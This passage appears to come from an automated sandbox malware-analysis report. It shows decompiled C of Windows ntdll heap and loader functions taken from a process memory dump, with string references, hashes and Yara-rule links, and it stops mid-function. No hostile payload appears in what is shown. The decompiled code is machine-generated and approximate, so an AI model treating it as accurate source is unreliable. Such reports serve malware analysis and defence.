								if(_t212 != 0) {
									_t146 = _t206 + 0xc0;
									break;
								}
								_t252 =  *_t252;
								_t211 = _v20;
								_t185 =  *(_t252 + 0x14);
							}
							L19:
							if(_t146 != _t212) {
								_t237 =  *(_t206 + 0x4c);
								_t253 = _v20;
								while(1) {
									__eflags = _t237;
									if(_t237 == 0) {
										_t147 =  *(_t212 - 8) & 0x0000ffff;
									} else {
										_t184 =  *(_t212 - 8);
										_t237 =  *(_t206 + 0x4c);
										__eflags = _t184 & _t237;
										if((_t184 & _t237) != 0) {
											_t184 = _t184 ^  *(_t206 + 0x50);
											__eflags = _t184;
										}
										_t147 = _t184 & 0x0000ffff;
									}
									__eflags = _t253 - (_t147 & 0x0000ffff);
									if(_t253 <= (_t147 & 0x0000ffff)) {
										goto L20;
									}
									_t212 =  *_t212;
									__eflags = _t206 + 0xc0 - _t212;
									if(_t206 + 0xc0 != _t212) {
										continue;
									} else {
										goto L20;
									}
									goto L56;
								}
							}
							L20:
							_t149 =  *((intOrPtr*)(_t212 + 4));
							_t33 = _t256 + 8; // -16
							_t238 = _t33;
							_t254 =  *_t149;
							if( *_t149 != _t212) {
								_push(_t212);
								E011FA80D(0, _t212, 0, _t254);
							} else {
								 *_t238 = _t212;
								 *((intOrPtr*)(_t238 + 4)) = _t149;
								 *_t149 = _t238;
								 *((intOrPtr*)(_t212 + 4)) = _t238;
							}
							 *((intOrPtr*)(_t206 + 0x74)) =  *((intOrPtr*)(_t206 + 0x74)) + ( *_t256 & 0x0000ffff);
							_t255 =  *((intOrPtr*)(_t206 + 0xb4));
							if(_t255 == 0) {
								L36:
								if( *(_t206 + 0x4c) != 0) {
									 *(_t256 + 3) =  *(_t256 + 1) ^  *(_t256 + 2) ^  *_t256;
									 *_t256 =  *_t256 ^  *(_t206 + 0x50);
								}
								_t210 = _v48;
								_t251 = _v12 & 0x0000ffff;
								_t131 = _v20;
								_t235 = _v24 - _t131;
								_v24 = _t235;
								_t256 = _t256 + _t131 * 8;
								if(_t256 >=  *((intOrPtr*)(_t210 + 0x28))) {
									goto L41;
								} else {
									goto L39;
								}
							} else {
								_t216 =  *_t256 & 0x0000ffff;
								_v28 = _t216;
								if(_t216 <  *((intOrPtr*)(_t255 + 4))) {
									L28:
									_t242 = _t216 -  *((intOrPtr*)(_t255 + 0x14));
									_v32 = _t242;
									if( *((intOrPtr*)(_t255 + 8)) != 0) {
										_t167 = _t242 + _t242;
									} else {
										_t167 = _t242;
									}
									 *((intOrPtr*)(_t255 + 0xc)) =  *((intOrPtr*)(_t255 + 0xc)) + 1;
									_t168 = _t167 << 2;
									_v40 = _t168;
									_t206 = _v44;
									_v16 =  *((intOrPtr*)(_t168 +  *((intOrPtr*)(_t255 + 0x20))));
									if(_t216 ==  *((intOrPtr*)(_t255 + 4)) - 1) {
										 *((intOrPtr*)(_t255 + 0x10)) =  *((intOrPtr*)(_t255 + 0x10)) + 1;
									}
									_t217 = _v16;
									if(_t217 != 0) {
										_t173 = _t217 - 8;
										_v52 = _t173;
										_t174 =  *_t173;
										__eflags =  *(_t206 + 0x4c);
										if( *(_t206 + 0x4c) != 0) {
											_t245 =  *(_t206 + 0x50) ^ _t174;
											_v36 = _t245;
											_t225 = _t245 >> 0x00000010 ^ _t245 >> 0x00000008 ^ _t245;
											__eflags = _t245 >> 0x18 - _t225;
											if(_t245 >> 0x18 != _t225) {
												_push(_t225);
												E011FA80D(_t206, _v52, 0, 0);
											}
											_t174 = _v36;
											_t217 = _v16;
											_t242 = _v32;
										}
										_v28 = _v28 - (_t174 & 0x0000ffff);
										__eflags = _v28;
										if(_v28 > 0) {
											goto L34;
										} else {
											goto L33;
										}
									} else {
										L33:
										_t58 = _t256 + 8; // -16
										 *((intOrPtr*)(_v40 +  *((intOrPtr*)(_t255 + 0x20)))) = _t58;
										_t206 = _v44;
										_t217 = _v16;
										L34:
										if(_t217 == 0) {
											asm("bts eax, edx");
										}
										goto L36;
									}
								} else {
									goto L24;
								}
								while(1) {
									L24:
									_t182 =  *_t255;
									if(_t182 == 0) {
										_t216 =  *((intOrPtr*)(_t255 + 4)) - 1;
										__eflags = _t216;
										goto L28;
									}
									_t255 = _t182;
									if(_t216 >=  *((intOrPtr*)(_t255 + 4))) {
										continue;
									} else {
										goto L28;
									}
								}
								goto L28;
							}
						}
					}
					L39:
				} while (_t235 != 0);
				_t214 = _v12;
				_t131 =  *(_t206 + 0x54) ^ _t214;
				 *(_t256 + 4) = _t131;
				if(_t214 == 0) {
					__eflags =  *0x1228748 - 1;
					if( *0x1228748 >= 1) {
						_t127 = _t256 + 0xfff; // 0xfff
						_t131 = _t127 & 0xfffff000;
						__eflags = _t131 - _t256;
						if(_t131 != _t256) {
							_t156 =  *[fs:0x30];
							__eflags =  *(_t156 + 0xc);
							if( *(_t156 + 0xc) == 0) {
								_push("HEAP: ");
								E0113B150();
							} else {
								E0113B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push("ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock");
							_t131 = E0113B150();
							__eflags =  *0x1227bc8;
							if(__eflags == 0) {
								_t131 = E011F2073(_t206, 1, _t251, __eflags);
							}
						}
					}
				}
				goto L41;
			}

0x0115a83a
0x0115a83c
0x0115a83e
0x0115a841
0x0115a844
0x0115a84a
0x0115aa53
0x0115aa59
0x0115aa59
0x0115a858
0x0115a85e
0x0115aaf5
0x0115aafc
0x011a229e
0x011a22a2
0x011a22a8
0x011a22b3
0x011a22b5
0x011a22bb
0x011a22c1
0x011a22c5
0x011a22e6
0x011a22eb
0x011a22f0
0x011a22c7
0x011a22dc
0x011a22e1
0x011a22e1
0x011a22f3
0x011a22f8
0x011a22fd
0x011a2300
0x011a2307
0x011a230e
0x011a230e
0x011a2313
0x011a2313
0x011a22b5
0x011a22a2
0x0115aafc
0x0115a864
0x0115a869
0x0115aa5c
0x0115aa5e
0x0115a86f
0x0115a87f
0x0115a885
0x0115a885
0x0115a88b
0x0115a890
0x0115a896
0x0115ab0c
0x0115ab0f
0x0115ab15
0x011a2320
0x011a2320
0x0115ab1b
0x0115a89c
0x0115a89f
0x0115a8a2
0x0115a8a2
0x0115a8a5
0x0115a8af
0x0115a8b3
0x0115a8b8
0x0115aa66
0x0115a8be
0x0115a8c5
0x0115a8c6
0x0115a8ce
0x011a2328
0x011a2332
0x011a2337
0x011a2337
0x0115a8ce
0x0115a8d4
0x0115a8d8
0x0115a8db
0x0115a8de
0x0115a8e1
0x0115a8e5
0x0115a8e8
0x0115a8f0
0x0115a8f3
0x011a234c
0x011a2350
0x011a2355
0x011a2359
0x011a2359
0x0115a8f9
0x0115a901
0x0115aae4
0x0115aae4
0x0115aaea
0x00000000
0x0115a907
0x0115a90a
0x0115a91d
0x0115a91d
0x00000000
0x0115a910
0x0115a910
0x0115a910
0x0115a914
0x0115a924
0x0115a924
0x0115a924
0x0115a924
0x0115a916
0x0115a91b
0x00000000
0x00000000
0x00000000
0x0115a91b
0x0115a925
0x0115a925
0x0115a932
0x0115a936
0x0115a93c
0x0115a93c
0x0115a93c
0x0115ab22
0x0115ab24
0x0115ab27
0x0115ab27
0x0115a942
0x0115a944
0x0115aaba
0x0115aabd
0x0115aac0
0x0115aac0
0x0115aac2
0x0115ab2f
0x0115aac4
0x0115aac4
0x0115aac7
0x0115aaca
0x0115aacc
0x0115aace
0x0115aace
0x0115aace
0x0115aad1
0x0115aad1
0x0115aad7
0x0115aad9
0x00000000
0x00000000
0x011a2361
0x011a2369
0x011a236b
0x00000000
0x011a2371
0x00000000
0x011a2371
0x00000000
0x011a236b
0x0115aac0
0x0115a94a
0x0115a94a
0x0115a94d
0x0115a94d
0x0115a950
0x0115a954
0x011a2376
0x011a2380
0x0115a95a
0x0115a95a
0x0115a95c
0x0115a95f
0x0115a961
0x0115a961
0x0115a967
0x0115a96a
0x0115a972
0x0115aa02
0x0115aa06
0x0115aa10
0x0115aa16
0x0115aa16
0x0115aa1b
0x0115aa21
0x0115aa24
0x0115aa27
0x0115aa29
0x0115aa2c
0x0115aa32
0x00000000
0x00000000
0x00000000
0x00000000
0x0115a978
0x0115a978
0x0115a97b
0x0115a981
0x0115a996
0x0115a998
0x0115a99f
0x0115a9a2
0x011a238a
0x0115a9a8
0x0115a9a8
0x0115a9a8
0x0115a9aa
0x0115a9ad
0x0115a9b0
0x0115a9bb
0x0115a9be
0x0115a9c7
0x0115a9c9
0x0115a9c9
0x0115a9cc
0x0115a9d1
0x0115aa6d
0x0115aa70
0x0115aa73
0x0115aa75
0x0115aa79
0x0115aa7e
0x0115aa82
0x0115aa8f
0x0115aa94
0x0115aa96
0x011a2392
0x011a23a1
0x011a23a1
0x0115aa9c
0x0115aa9f
0x0115aaa2
0x0115aaa2
0x0115aaa8
0x0115aaab
0x0115aaaf
0x00000000
0x0115aab5
0x00000000
0x0115aab5
0x0115a9d7
0x0115a9d7
0x0115a9da
0x0115a9e0
0x0115a9e3
0x0115a9e6
0x0115a9e9
0x0115a9eb
0x0115a9fd
0x0115a9fd
0x00000000
0x0115a9eb
0x00000000
0x00000000
0x00000000
0x0115a983
0x0115a983
0x0115a983
0x0115a987
0x0115a995
0x0115a995
0x0115a995
0x0115a995
0x0115a989
0x0115a98e
0x00000000
0x0115a990
0x00000000
0x0115a990
0x0115a98e
0x00000000
0x0115a983
0x0115a972
0x0115a90a
0x0115aa34
0x0115aa34
0x0115aa40
0x0115aa43
0x0115aa46
0x0115aa4d
0x011a23ab
0x011a23b2
0x011a23b8
0x011a23be
0x011a23c3
0x011a23c5
0x011a23cb
0x011a23d1
0x011a23d5
0x011a23f6
0x011a23fb
0x011a23d7
0x011a23ec
0x011a23f1
0x011a2403
0x011a2408
0x011a2410
0x011a2417
0x011a2422
0x011a2422
0x011a2417
0x011a23c5
0x011a23b2
0x00000000

Strings

HEAP: , xrefs: 011A22E6, 011A23F6
ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 011A2403
HEAP[%wZ]: , xrefs: 011A22D7, 011A23E7
((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 011A22F3

Memory Dump Source

Source File: 00000001.00000002.715544167.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: true

Similarity

API ID:
String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
API String ID: 0-1657114761
Opcode ID: 5d46440e5621641d20c0336bb10af620bb4dbd7887c1c0c182603430ac2da4c4
Instruction ID: 771e8626730a7add642f6beaf756ae3fc7d6024ee387ea76f914628ff3c16ec5
Opcode Fuzzy Hash: 5d46440e5621641d20c0336bb10af620bb4dbd7887c1c0c182603430ac2da4c4
Instruction Fuzzy Hash: 5DD1DF34A44246CFDB5DCF68E490BBABBF1FF48300F158669D9AA9B345E334A841CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0115A229, Relevance: 5.2, Strings: 4, Instructions: 183
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E0115A229(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				char _v28;
				void* _v44;
				void* _v48;
				void* _v56;
				void* _v60;
				void* __ebx;
				signed int _t55;
				signed int _t57;
				void* _t61;
				intOrPtr _t62;
				void* _t65;
				void* _t71;
				signed char* _t74;
				intOrPtr _t75;
				signed char* _t80;
				intOrPtr _t81;
				void* _t82;
				signed char* _t85;
				signed char _t91;
				void* _t103;
				void* _t105;
				void* _t121;
				void* _t129;
				signed int _t131;
				void* _t133;

				_t105 = __ecx;
				_t133 = (_t131 & 0xfffffff8) - 0x1c;
				_t103 = __edx;
				_t129 = __ecx;
				E0115DF24(__edx,  &_v28, _t133);
				_t55 =  *(_t129 + 0x40) & 0x00040000;
				asm("sbb edi, edi");
				_t121 = ( ~_t55 & 0x0000003c) + 4;
				if(_t55 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t129);
					_push(0xffffffff);
					_t57 = E01179730();
					__eflags = _t57;
					if(_t57 < 0) {
						L17:
						_push(_t105);
						E011FA80D(_t129, 1, _v20, 0);
						_t121 = 4;
						goto L1;
					}
					__eflags = _v20 & 0x00000060;
					if((_v20 & 0x00000060) == 0) {
						goto L17;
					}
					__eflags = _v24 - _t129;
					if(_v24 == _t129) {
						goto L1;
					}
					goto L17;
				}
				L1:
				_push(_t121);
				_push(0x1000);
				_push(_t133 + 0x14);
				_push(0);
				_push(_t133 + 0x20);
				_push(0xffffffff);
				_t61 = E01179660();
				_t122 = _t61;
				if(_t61 < 0) {
					_t62 =  *[fs:0x30];
					 *((intOrPtr*)(_t129 + 0x218)) =  *((intOrPtr*)(_t129 + 0x218)) + 1;
					__eflags =  *(_t62 + 0xc);
					if( *(_t62 + 0xc) == 0) {
						_push("HEAP: ");
						E0113B150();
					} else {
						E0113B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *((intOrPtr*)(_t133 + 0xc)));
					_push( *((intOrPtr*)(_t133 + 0x14)));
					_push(_t129);
					E0113B150("ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t122);
					_t65 = 0;
					L13:
					return _t65;
				}
				_t71 = E01157D50();
				_t124 = 0x7ffe0380;
				if(_t71 != 0) {
					_t74 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t74 = 0x7ffe0380;
				}
				if( *_t74 != 0) {
					_t75 =  *[fs:0x30];
					__eflags =  *(_t75 + 0x240) & 0x00000001;
					if(( *(_t75 + 0x240) & 0x00000001) != 0) {
						E011F138A(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)),  *((intOrPtr*)(_t133 + 0x10)), 8);
					}
				}
				 *((intOrPtr*)(_t129 + 0x230)) =  *((intOrPtr*)(_t129 + 0x230)) - 1;
				 *((intOrPtr*)(_t129 + 0x234)) =  *((intOrPtr*)(_t129 + 0x234)) -  *((intOrPtr*)(_t133 + 0xc));
				if(E01157D50() != 0) {
					_t80 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t80 = _t124;
				}
				if( *_t80 != 0) {
					_t81 =  *[fs:0x30];
					__eflags =  *(_t81 + 0x240) & 0x00000001;
					if(( *(_t81 + 0x240) & 0x00000001) != 0) {
						__eflags = E01157D50();
						if(__eflags != 0) {
							_t124 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						E011F1582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t124 & 0x000000ff);
					}
				}
				_t82 = E01157D50();
				_t125 = 0x7ffe038a;
				if(_t82 != 0) {
					_t85 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
				} else {
					_t85 = 0x7ffe038a;
				}
				if( *_t85 != 0) {
					__eflags = E01157D50();
					if(__eflags != 0) {
						_t125 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
						__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
					}
					E011F1582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t125 & 0x000000ff);
				}
				 *((intOrPtr*)(_t129 + 0x20c)) =  *((intOrPtr*)(_t129 + 0x20c)) + 1;
				_t91 =  *(_t103 + 2);
				if((_t91 & 0x00000004) != 0) {
					E0118D5E0( *((intOrPtr*)(_t133 + 0x18)),  *((intOrPtr*)(_t133 + 0x10)), 0xfeeefeee);
					_t91 =  *(_t103 + 2);
				}
				 *(_t103 + 2) = _t91 & 0x00000017;
				_t65 = 1;
				goto L13;
			}

0x0115a229
0x0115a231
0x0115a23f
0x0115a242
0x0115a244
0x0115a24c
0x0115a255
0x0115a25a
0x0115a25f
0x011a1c76
0x011a1c78
0x011a1c7e
0x011a1c7f
0x011a1c81
0x011a1c82
0x011a1c84
0x011a1c89
0x011a1c8b
0x011a1c9e
0x011a1c9e
0x011a1cab
0x011a1cb2
0x00000000
0x011a1cb2
0x011a1c8d
0x011a1c92
0x00000000
0x00000000
0x011a1c94
0x011a1c98
0x00000000
0x00000000
0x00000000
0x011a1c98
0x0115a265
0x0115a265
0x0115a266
0x0115a26f
0x0115a270
0x0115a276
0x0115a277
0x0115a279
0x0115a27e
0x0115a282
0x011a1db5
0x011a1dbb
0x011a1dc1
0x011a1dc5
0x011a1de4
0x011a1de9
0x011a1dc7
0x011a1ddc
0x011a1de1
0x011a1def
0x011a1df3
0x011a1df7
0x011a1dfe
0x011a1e06
0x0115a302
0x0115a308
0x0115a308
0x0115a288
0x0115a28d
0x0115a294
0x011a1cc1
0x0115a29a
0x0115a29a
0x0115a29a
0x0115a29f
0x011a1ccb
0x011a1cd1
0x011a1cd8
0x011a1cea
0x011a1cea
0x011a1cd8
0x0115a2a9
0x0115a2af
0x0115a2bc
0x011a1cfd
0x0115a2c2
0x0115a2c2
0x0115a2c2
0x0115a2c7
0x011a1d07
0x011a1d0d
0x011a1d14
0x011a1d1f
0x011a1d21
0x011a1d2c
0x011a1d2c
0x011a1d2c
0x011a1d47
0x011a1d47
0x011a1d14
0x0115a2cd
0x0115a2d2
0x0115a2d9
0x011a1d5a
0x0115a2df
0x0115a2df
0x0115a2df
0x0115a2e4
0x011a1d69
0x011a1d6b
0x011a1d76
0x011a1d76
0x011a1d76
0x011a1d91
0x011a1d91
0x0115a2ea
0x0115a2f0
0x0115a2f5
0x011a1da8
0x011a1dad
0x011a1dad
0x0115a2fd
0x0115a300
0x00000000

Strings

HEAP: , xrefs: 011A1DE4
HEAP[%wZ]: , xrefs: 011A1DD7
ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 011A1DF9
`, xrefs: 011A1C8D

Memory Dump Source

Source File: 00000001.00000002.715544167.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: true

Similarity

API ID: InitializeThunk
String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
API String ID: 2994545307-2586055223
Opcode ID: 1f346625eca1a6908dfb49c97837f0dafe5c47e32be4c9c74dff464cb2017b8f
Instruction ID: 40fdf606be35f4d2e55fc0a9f41bf0133e6ba2afc35c9fa3a9ba74871bea4bce
Opcode Fuzzy Hash: 1f346625eca1a6908dfb49c97837f0dafe5c47e32be4c9c74dff464cb2017b8f
Instruction Fuzzy Hash: 62512832244681EFD72ADB68D849F6B7BE8FF80754F090568F965CB291D774D800CB62

Uniqueness

Uniqueness Score: -1.00%

Function 01168E00, Relevance: 5.1, Strings: 4, Instructions: 126
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E01168E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x122d360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x1228464; // 0x73b80110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x1225780 & 0x00000003) != 0) {
							E011B5510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x1225780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E0117B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x1227984; // 0xbf2b38
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x1228464; // 0x73b80110
					 *0x122b1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E01169B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x1225780 & 0x00000005) != 0) {
						_push(_t49);
						E011B5510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}

0x01168e0f
0x01168e16
0x01168e19
0x01168e1b
0x01168e21
0x01168e7f
0x01168e85
0x011a9354
0x011a936c
0x011a9371
0x011a937b
0x011a9381
0x011a9381
0x011a937b
0x01168e9d
0x01168e9d
0x01168e29
0x01168e2c
0x01168e38
0x01168e3e
0x01168e43
0x01168eb5
0x01168eb9
0x011a92aa
0x011a92af
0x011a92e8
0x011a92e8
0x011a92af
0x01168eb9
0x01168e45
0x01168e53
0x01168e5b
0x01168e5f
0x01168e78
0x01168e78
0x01168e7d
0x01168ec3
0x01168ecd
0x01168ed2
0x01168ed2
0x01168ec5
0x01168ec5
0x00000000
0x01168e7d
0x01168e67
0x01168ea4
0x011a931a
0x00000000
0x00000000
0x011a9320
0x01168ea4
0x01168e70
0x011a9325
0x011a9340
0x011a9345
0x011a9345
0x01168e76
0x00000000
0x00000000
0x00000000
0x00000000

Strings

Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 011A932A
minkernel\ntdll\ldrsnap.c, xrefs: 011A933B, 011A9367
LdrpFindDllActivationContext, xrefs: 011A9331, 011A935D
Querying the active activation context failed with status 0x%08lx, xrefs: 011A9357

Memory Dump Source

Source File: 00000001.00000002.715544167.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: true

Similarity

API ID:
String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
API String ID: 0-3779518884
Opcode ID: d6a1d2b9616ffd5476ce0eeddbc49befe7957db99c6ddf2260b3c075bd601b7d
Instruction ID: 028f221748bd198f74669ed4d0214336ea7f5d725d80831fa5203881aba603b4
Opcode Fuzzy Hash: d6a1d2b9616ffd5476ce0eeddbc49befe7957db99c6ddf2260b3c075bd601b7d
Instruction Fuzzy Hash: 3C411A31A41335AFDB3EAB5C9C4DB79BABDAB00248F464169E90457151E7729DE0C381

Uniqueness

Uniqueness Score: -1.00%

Function 011F49A4, Relevance: 5.1, Strings: 4, Instructions: 114COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 011F4A4A, 011F4A5D, 011F4A5F, 011F4AC4
This is located in the %s field of the heap header., xrefs: 011F4AD6
HEAP[%wZ]: , xrefs: 011F4A3D, 011F4AB7
Heap %p - headers modified (%p is %lx instead of %lx), xrefs: 011F4A61

Memory Dump Source

Source File: 00000001.00000002.715544167.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: true

Similarity

API ID: InitializeThunk
String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
API String ID: 2994545307-336120773
Opcode ID: 8799e98845bdfd29a20111868552779ef5b0343d8955676e1697b46ee93655d7
Instruction ID: 69f36bab67208a18168391561e56eeff028b3e82ea862c4b044535f3e47705ce
Opcode Fuzzy Hash: 8799e98845bdfd29a20111868552779ef5b0343d8955676e1697b46ee93655d7
Instruction Fuzzy Hash: 56314836200101FFD32CDB59D884F6BB7E8EF04624F19406EF6068B691E771E888CB59

Uniqueness

Uniqueness Score: -1.00%

Function 01148794, Relevance: 4.0, Strings: 3, Instructions: 255
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E01148794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E0114934A() != 0) {
								_t159 = E011BA9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x1225780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E011B5510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x1225780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E0114849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E01148999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E01148999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x1225c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x1225c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E01152280(_t92, 0x12286cc);
															_t94 = E01209DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
